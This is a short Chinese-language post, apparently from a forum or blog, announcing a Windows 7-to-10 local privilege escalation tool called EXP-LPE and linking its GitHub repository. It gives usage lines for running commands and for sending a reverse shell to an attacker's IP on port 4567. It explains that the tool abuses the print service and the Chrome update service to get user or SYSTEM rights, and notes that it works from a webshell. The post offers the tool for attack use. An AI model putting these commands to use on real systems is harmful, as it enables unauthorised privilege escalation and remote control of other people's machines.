关于漏洞不多说什么自己看一下介绍
目前还没有为其分配编号
漏洞针对的是win7及win7以上到win10(因兼容引发的血案)
利用程序
EXP-LPE -e calc //执行命令,如果要执行程序要用绝对路径 EXP-LPE -g ip //反弹shell到4567端口
详细说明:
执行命令只能针对win8和win8以上要问为什么自己去把程序看看利用的是打印服务
利用谷歌浏览器更新服务反弹shell是可能有两个权限的一个是用户权限及手动更新服务和system系统权限开机延迟启动更新服务这里要说明如果需要的服务被禁用了那自然无法成功而且普通权限下也无法启动停止的服务但是以上这些服务默认都是开启的
webshell下使用正常
写的匆忙还有一些功能没加还有这个程序可能有一些小BUG
https://github.com/WBGlIl/EXP-LPE